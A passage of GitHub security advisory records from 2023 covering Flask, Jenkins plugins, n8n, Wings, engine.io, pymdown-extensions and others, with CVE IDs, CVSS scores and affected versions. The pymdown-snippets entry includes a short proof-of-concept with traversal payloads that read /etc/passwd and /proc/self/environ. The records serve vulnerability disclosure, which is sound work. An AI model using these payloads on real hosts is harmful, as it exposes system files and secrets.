[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31826'}, {'type': 'WEB', 'url': 'https://github.com/skyscreamer/nevado/issues/121'}, {'type': 'PACKAGE', 'url': 'https://github.com/skyscreamer/nevado'}, {'type': 'WEB', 'url': 'https://github.com/skyscreamer/nevado/releases'}, {'type': 'WEB', 'url': 'https://novysodope.github.io/2023/04/01/95/'}, {'type': 'WEB', 'url': 'http://nevado.skyscreamer.org/'}]
|
{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-23T19:56:43Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-m2qf-hxjv-5gpq
|
2023-05-01T19:22:20Z
|
2023-05-01T19:22:20Z
| null |
['CVE-2023-30861']
|
Flask vulnerable to possible disclosure of permanent session cookie due to missing Vary: Cookie header
|
When all of the following conditions are met, a response containing data intended for one client may be cached and subsequently sent by a proxy to other clients. If the proxy also caches `Set-Cookie` headers, it may send one client's `session` cookie to other clients. The severity depends on the application's use of the session, and the proxy's behavior regarding cookies. The risk depends on _all_ these conditions being met.
1. The application must be hosted behind a caching proxy that does not strip cookies or ignore responses with cookies.
2. The application sets [`session.permanent = True`](https://flask.palletsprojects.com/en/2.3.x/api/#flask.session.permanent).
2. The application does not access or modify the session at any point during a request.
4. [`SESSION_REFRESH_EACH_REQUEST`](https://flask.palletsprojects.com/en/2.3.x/config/#SESSION_REFRESH_EACH_REQUEST) is enabled (the default).
5. The application does not set a `Cache-Control` header to indicate that a page is private or should not be cached.
This happens because vulnerable versions of Flask only set the `Vary: Cookie` header when the session is accessed or modified, not when it is refreshed (re-sent to update the expiration) without being accessed or modified.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'flask'}, 'ecosystem_specific': {'affected_functions': ['flask.sessions.SecureCookieSessionInterface.save_session']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'flask'}, 'ecosystem_specific': {'affected_functions': ['flask.sessions.SecureCookieSessionInterface.save_session']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30861'}, {'type': 'WEB', 'url': 'https://github.com/pallets/flask/commit/70f906c51ce49c485f1d355703e9cc3386b1cc2b'}, {'type': 'WEB', 'url': 'https://github.com/pallets/flask/commit/afd63b16170b7c047f5758eb910c416511e9c965'}, {'type': 'PACKAGE', 'url': 'https://github.com/pallets/flask'}, {'type': 'WEB', 'url': 'https://github.com/pallets/flask/releases/tag/2.2.5'}, {'type': 'WEB', 'url': 'https://github.com/pallets/flask/releases/tag/2.3.2'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/flask/PYSEC-2023-62.yaml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/08/msg00024.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230818-0006/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5442'}]
|
{'cwe_ids': ['CWE-539'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T19:22:20Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-m69h-4frq-vwq7
|
2023-05-10T15:26:56Z
|
2023-05-04T03:30:22Z
| null |
['CVE-2023-30331']
|
Server-side template injection in beetl
|
An issue in the render function of beetl v3.15.0 allows attackers to execute server-side template injection (SSTI) via a crafted payload.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.ibeetl:beetl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.15.0.RELEASE'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30331'}, {'type': 'WEB', 'url': 'https://gitee.com/xiandafu/beetl/issues/I6RUIP'}, {'type': 'PACKAGE', 'url': 'https://github.com/javamonkey/beetl2.0'}, {'type': 'WEB', 'url': 'https://github.com/luelueking/Beetl-3.15.0-vuln-poc'}]
|
{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T02:21:41Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vgfw-766v-7q82
|
2023-06-01T17:16:27Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-32998']
|
Jenkins AppSpider Plugin Cross-Site Request Forgery vulnerability
|
A cross-site request forgery (CSRF) vulnerability in Jenkins AppSpider Plugin 1.0.15 and earlier allows attackers to connect to an attacker-specified URL and send an HTTP POST request with a JSON payload consisting of attacker-specified credentials.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.rapid7:jenkinsci-appspider-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.16'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.15'}}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32998'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/appspider-build-scanner-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3121'}]
|
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:36:32Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-6gp4-2f92-j2w5
|
2023-05-17T02:59:02Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-32979']
|
Jenkins Email Extension Plugin missing permission check
|
Jenkins Email Extension Plugin 2.96 and earlier does not perform a permission check in a method implementing form validation.
This allows attackers with Overall/Read permission to check for the existence of files in the `email-templates/` directory in the Jenkins home directory on the controller file system.
This form validation method requires the appropriate permission in Email Extension Plugin 2.96.1.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:email-ext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.96.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32979'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3088%20(1)'}]
|
{'cwe_ids': ['CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T02:59:02Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-g82w-58jf-gcxx
|
2023-06-07T16:04:02Z
|
2023-05-26T13:59:19Z
| null |
['CVE-2023-2878']
|
secrets-store-csi-driver discloses service account tokens in logs
|
A security issue was discovered in secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when [TokenRequests is configured in the CSIDriver object](https://kubernetes-csi.github.io/docs/token-requests.html) and the driver is set to run at log level 2 or greater via the -v flag.
This issue has been rated MEDIUM [CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N) (6.5), and assigned CVE-2023-2878
### Am I vulnerable?
You may be vulnerable if [TokenRequests is configured in the CSIDriver object](https://kubernetes-csi.github.io/docs/token-requests.html) and the driver is set to run at log level 2 or greater via the -v flag.
To check if token requests are configured, run the following command:
```bash
kubectl get csidriver secrets-store.csi.k8s.io -o jsonpath="{.spec.tokenRequests}"
```
To check if tokens are being logged, examine the secrets-store container log:
```bash
kubectl logs -l app=secrets-store-csi-driver -c secrets-store -f | grep --line-buffered "csi.storage.k8s.io/serviceAccount.tokens"
```
### Affected Versions
- secrets-store-csi-driver < 1.3.3
### How do I mitigate this vulnerability?
Prior to upgrading, this vulnerability can be mitigated by running secrets-store-csi-driver at log level 0 or 1 via the -v flag.
### Fixed Versions
- secrets-store-csi-driver >= 1.3.3
To upgrade, refer to the documentation: https://secrets-store-csi-driver.sigs.k8s.io/getting-started/upgrades.html#upgrades
### Detection
Examine cloud provider logs for unexpected token exchanges, as well as unexpected access to cloud vault secrets.
If you find evidence that this vulnerability has been exploited, please contact [security@kubernetes.io](https://groups.google.com/)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'sigs.k8s.io/secrets-store-csi-driver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/kubernetes-sigs/secrets-store-csi-driver/security/advisories/GHSA-g82w-58jf-gcxx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2878'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/118419'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes-sigs/secrets-store-csi-driver'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes-sigs/secrets-store-csi-driver/releases/tag/v1.3.3'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-announce/c/5K8ghQHBDdQ/m/Udee6YUgAAAJ'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230814-0003/'}]
|
{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-26T13:59:19Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-p58x-7733-vp9m
|
2023-05-17T21:32:37Z
|
2023-05-10T15:30:22Z
| null |
['CVE-2023-27562']
|
n8n Directory Traversal vulnerability
|
The n8n package prior to version 0.216.1 for Node.js allows Directory Traversal.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'n8n'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.216.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27562'}, {'type': 'PACKAGE', 'url': 'https://github.com/n8n-io/n8n'}, {'type': 'WEB', 'url': 'https://github.com/n8n-io/n8n/releases'}, {'type': 'WEB', 'url': 'https://github.com/n8n-io/n8n/releases/tag/n8n%400.216.1'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230622-0007/'}, {'type': 'WEB', 'url': 'https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:44:25Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-hjp3-5g2q-7jww
|
2023-05-01T14:00:47Z
|
2023-05-01T14:00:47Z
| null |
[]
|
Race Condition leading to logging errors
|
In certain setups with threaded web servers, Audited's use of `Thread.current` can incorrectly attributed audits to the wrong user.
Fixed in 5.3.3.
In March, @convisoappsec noticed that the library in question had a Race Condition problem, which caused logs to be registered at times with different users than those who performed the genuine actions.
- The first issue we identified was from November 2021: https://github.com/collectiveidea/audited/issues/601
- So the solution was implemented in the following Pull Request: https://github.com/collectiveidea/audited/pull/669
- And the feature was published in version 5.3.3: RELEASE: https://github.com/collectiveidea/audited/pull/671
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'RubyGems', 'name': 'audited'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '5.3.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/collectiveidea/audited/security/advisories/GHSA-hjp3-5g2q-7jww'}, {'type': 'WEB', 'url': 'https://github.com/collectiveidea/audited/issues/601'}, {'type': 'WEB', 'url': 'https://github.com/collectiveidea/audited/pull/669'}, {'type': 'WEB', 'url': 'https://github.com/collectiveidea/audited/pull/671'}, {'type': 'PACKAGE', 'url': 'https://github.com/collectiveidea/audited'}]
|
{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T14:00:47Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-38hw-368m-7jmg
|
2023-05-17T03:05:51Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-32982']
|
Jenkins Ansible Plugin stores and displays secrets in plain text
|
Jenkins Ansible Plugin allows the specification of extra variables that can be passed to Ansible. These extra variables are commonly used to pass secrets.
Ansible Plugin 204.v8191fd551eb_f and earlier stores these extra variables unencrypted in job config.xml files on the Jenkins controller as part of its configuration.
These extra variables can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.
Additionally, the job configuration form does not mask these extra variables, increasing the potential for attackers to observe and capture them.
Ansible Plugin 205.v4cb_c48657c21 masks extra variables displayed on the configuration form, and stores them encrypted once job configurations are saved again.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '205.v4cb'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32982'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3017'}]
|
{'cwe_ids': ['CWE-311'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:05:51Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-6v6h-rw43-97fh
|
2023-05-17T02:52:42Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-32993']
|
Jenkins SAML Single Sign On(SSO) Plugin missing hostname validation
|
Jenkins SAML Single Sign On(SSO) Plugin 2.0.2 and earlier does not perform hostname validation when connecting to miniOrange or the configured IdP to retrieve SAML metadata.
This lack of validation could be abused using a man-in-the-middle attack to intercept these connections.
SAML Single Sign On(SSO) Plugin 2.1.0 performs hostname validation when connecting to miniOrange or the configured IdP to retrieve SAML metadata.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:miniorange-saml-sp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32993'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3001%20(1)'}]
|
{'cwe_ids': ['CWE-345'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T02:52:42Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-p744-4q6p-hvc2
|
2023-05-11T19:54:17Z
|
2023-05-11T19:54:17Z
| null |
['CVE-2023-32080']
|
Wings vulnerable to escape to host from installation container
|
### Impact
This vulnerability impacts anyone running the affected versions of Wings. This vulnerability can be used to gain access to the host system running Wings if a user is able to modify an server's install script or the install script executes code supplied by the user (either through environment variables, or commands that execute commands based off of user data).
### Patches
This vulnerability has been resolved in version `v1.11.6` of Wings, and has been back-ported to the 1.7 release series in `v1.7.5`.
Anyone running `v1.11.x` should upgrade to `v1.11.6` and anyone running `v1.7.x` should upgrade to `v1.7.5`.
### Workarounds
Running Wings with a rootless container runtime may mitigate the severity of any attacks, however the majority of users are using container runtimes that run as root as per our documentation.
SELinux may prevent attackers from performing certain operations against the host system, however privileged containers have a lot of freedom even on systems with SELinux enabled.
TL;DR: None at this time.
### Extra details
It should be noted that this was a known attack vector, for attackers to easily exploit this attack it would require compromising an administrator account on a Panel. However, certain eggs (the data structure that holds the install scripts that get passed to Wings) have an issue where they are unknowingly executing shell commands with escalated privileges provided by untrusted user data.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/pterodactyl/wings'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/pterodactyl/wings'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.11.0'}, {'fixed': '1.11.6'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/security/advisories/GHSA-p744-4q6p-hvc2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32080'}, {'type': 'PACKAGE', 'url': 'https://github.com/pterodactyl/wings'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/releases/tag/v1.11.6'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/releases/tag/v1.17.5'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/releases/tag/v1.7.5'}]
|
{'cwe_ids': ['CWE-250'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T19:54:17Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-jv3f-7m33-qp65
|
2023-06-01T14:51:36Z
|
2023-05-26T13:57:27Z
| null |
['CVE-2023-33955']
|
Minio console object names with RIGHT-TO-LEFT OVERRIDE unicode character can be exploited
|
### Impact
Unicode RIGHT-TO-LEFT OVERRIDE characters can be used to mask the original filename.
### Reported-By
Thanks to the report from Mio Li [wulilixi1@gmail.com](mailto:wulilixi1@gmail.com)
### Patches
```
commit 17e791afb90c9ad27c65f63c6be14f2f6a3a9d60
Author: Daniel Valdivia <18384552+dvaldivia@users.noreply.github.com>
Date: Tue May 23 08:47:12 2023 -0700
Replace RIGHT-TO-LEFT OVERRIDE unicode (#2828)
Signed-off-by: Daniel Valdivia <18384552+dvaldivia@users.noreply.github.com>
```
### Workarounds
Workarounds are to remove the concerned file and rewrite it properly with the right file and extensions. Avoid using RTLO characters in your filenames.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/minio/console'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.28.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33955'}, {'type': 'WEB', 'url': 'https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60'}, {'type': 'PACKAGE', 'url': 'https://github.com/minio/console'}, {'type': 'WEB', 'url': 'https://github.com/minio/console/releases/tag/v0.28.0'}]
|
{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-26T13:57:27Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-jh85-wwv9-24hv
|
2023-08-24T20:43:46Z
|
2023-05-15T20:50:23Z
| null |
['CVE-2023-32309']
|
Any file can be included with the pymdown-snippets extension
|
### Summary
Arbitrary file read when using include file syntax.
### Details
By using the syntax `--8<--"/etc/passwd"` or `--8<--"/proc/self/environ"` the content of these files will be rendered in the generated documentation. Additionally, a path relative to a specified, allowed base path can also be used to render the content of a file outside the specified base paths: `--8<-- "../../../../etc/passwd"`.
Within the Snippets extension, there exists a `base_path` option but the implementation is vulnerable to Directory Traversal.
The vulnerable section exists in `get_snippet_path(self, path)` lines 155 to 174 in snippets.py.
```
base = "docs"
path = "/etc/passwd"
filename = os.path.join(base,path) # Filename is now /etc/passwd
```
### PoC
```py
import markdown
payload = "--8<-- \"/etc/passwd\""
html = markdown.markdown(payload, extensions=['pymdownx.snippets'])
print(html)
```
### Impact
Any readable file on the host where the plugin is executing may have its content exposed. This can impact any use of Snippets that exposes the use of Snippets to external users.
It is never recommended to use Snippets to process user-facing, dynamic content. It is designed to process known content on the backend under the control of the host, but if someone were to accidentally enable it for user-facing content, undesired information could be exposed.
### Suggestion
Specified snippets should be restricted to the configured, specified base paths as a safe default. Allowing relative or absolute paths that escape the specified base paths would need to be behind a feature switch that must be opt-in and would be at the developer's own risk.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'pymdown-extensions'}, 'ecosystem_specific': {'affected_functions': ['pymdownx.snippets.SnippetPreprocessor', 'pymdownx.snippets.SnippetPreprocessor.get_snippet_path', 'pymdownx.snippets.SnippetExtension']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5'}, {'fixed': '10.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/facelessuser/pymdown-extensions/security/advisories/GHSA-jh85-wwv9-24hv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32309'}, {'type': 'WEB', 'url': 'https://github.com/facelessuser/pymdown-extensions/commit/b7bb4878d6017c03c8dc97c42d8d3bb6ee81db9d'}, {'type': 'PACKAGE', 'url': 'https://github.com/facelessuser/pymdown-extensions'}, {'type': 'WEB', 'url': 'https://github.com/facelessuser/pymdown-extensions/releases/tag/10.0'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-15T20:50:23Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-46f2-x6h2-x9hx
|
2023-05-17T03:07:51Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-32986']
|
Jenkins File Parameter Plugin arbitrary file write vulnerability
|
Jenkins File Parameter Plugin 285.v757c5b_67a_c25 and earlier does not restrict the name (and resulting uploaded file name) of Stashed File Parameters.
This allows attackers with Item/Configure permission to create or replace arbitrary files on the Jenkins controller file system with attacker-specified content.
File Parameter Plugin 285.287.v4b_7b_29d3469d restricts the name (and resulting uploaded file name) of Stashed File Parameters.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:file-parameters'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '285.287.v4b'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32986'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3123'}]
|
{'cwe_ids': ['CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:07:51Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-769c-p92r-xgxj
|
2023-06-03T00:08:33Z
|
2023-05-24T18:30:26Z
| null |
['CVE-2023-33947']
|
Liferay portal has unauthorized access to object definition via search
|
The Object module in Liferay Portal 7.4.3.4 through 7.4.3.60, and Liferay DXP 7.4 before update 61 does not segment object definition by virtual instance in search which allows remote authenticated users in one virtual instance to view object definition from a second virtual instance by searching for the object definition.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.4.3.4'}, {'fixed': '7.4.3.61'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33947'}, {'type': 'PACKAGE', 'url': 'https://github.com/liferay/liferay-portal'}, {'type': 'WEB', 'url': 'https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-33947'}]
|
{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T21:53:14Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-36cm-h8gv-mg97
|
2023-05-19T23:45:12Z
|
2023-05-19T18:30:25Z
| null |
['CVE-2023-2665']
|
RosarioSIS Stores Sensitive Data in a Mechanism without Access Control
|
RosarioSIS prior to 11.0 allows anyone, regardless of authentication status, to download and view file attachments under the `salaries` module. In addition, the file names contain a date in a `YYYY-MM-DD` format and a random six-string digit, making enumerating file names with automated tools relatively easy. This could allow an attacker to gain access to sensitive salary information. The patch for version 11.0 adds microseconds to filenames to make them harder to guess.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'francoisjacquet/rosariosis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '11.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2665'}, {'type': 'WEB', 'url': 'https://github.com/francoisjacquet/rosariosis/commit/09d5afaa6be07688ca1a7ac3b755b5438109e986'}, {'type': 'PACKAGE', 'url': 'https://github.com/francoisjacquet/rosariosis'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/42f38a84-8954-484d-b5ff-706ca0918194'}]
|
{'cwe_ids': ['CWE-921', 'CWE-922'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-19T23:45:12Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-q9mw-68c2-j6m5
|
2023-05-09T16:32:21Z
|
2023-05-03T21:56:51Z
| null |
['CVE-2023-31125']
|
engine.io Uncaught Exception vulnerability
|
### Impact
A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process.
```
TypeError: Cannot read properties of undefined (reading 'handlesUpgrades')
at Server.onWebSocket (build/server.js:515:67)
```
This impacts all the users of the [`engine.io`](https://www.npmjs.com/package/engine.io) package, including those who uses depending packages like [`socket.io`](https://www.npmjs.com/package/socket.io).
### Patches
A fix has been released today (2023/05/02): [6.4.2](https://github.com/socketio/engine.io/releases/tag/6.4.2)
This bug was introduced in version 5.1.0 and included in version 4.1.0 of the `socket.io` parent package. Older versions are not impacted.
For `socket.io` users:
| Version range | `engine.io` version | Needs minor update? |
|-----------------------------|---------------------|--------------------------------------------------------------------------------------------------------|
| `socket.io@4.6.x` | `~6.4.0` | `npm audit fix` should be sufficient |
| `socket.io@4.5.x` | `~6.2.0` | Please upgrade to `socket.io@4.6.x` |
| `socket.io@4.4.x` | `~6.1.0` | Please upgrade to `socket.io@4.6.x` |
| `socket.io@4.3.x` | `~6.0.0` | Please upgrade to `socket.io@4.6.x` |
| `socket.io@4.2.x` | `~5.2.0` | Please upgrade to `socket.io@4.6.x` |
| `socket.io@4.1.x` | `~5.1.1` | Please upgrade to `socket.io@4.6.x` |
| `socket.io@4.0.x` | `~5.0.0` | Not impacted |
| `socket.io@3.1.x` | `~4.1.0` | Not impacted |
| `socket.io@3.0.x` | `~4.0.0` | Not impacted |
| `socket.io@2.5.0` | `~3.6.0` | Not impacted |
| `socket.io@2.4.x` and below | `~3.5.0` | Not impacted |
### Workarounds
There is no known workaround except upgrading to a safe version.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [`engine.io`](https://github.com/socketio/engine.io)
Thanks to Thomas Rinsma from Codean for the responsible disclosure.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'engine.io'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '6.4.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/socketio/engine.io/security/advisories/GHSA-q9mw-68c2-j6m5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31125'}, {'type': 'WEB', 'url': 'https://github.com/socketio/engine.io/commit/fc480b4f305e16fe5972cf337d055e598372dc44'}, {'type': 'PACKAGE', 'url': 'https://github.com/socketio/engine.io'}, {'type': 'WEB', 'url': 'https://github.com/socketio/engine.io/releases/tag/6.4.2'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230622-0002/'}]
|
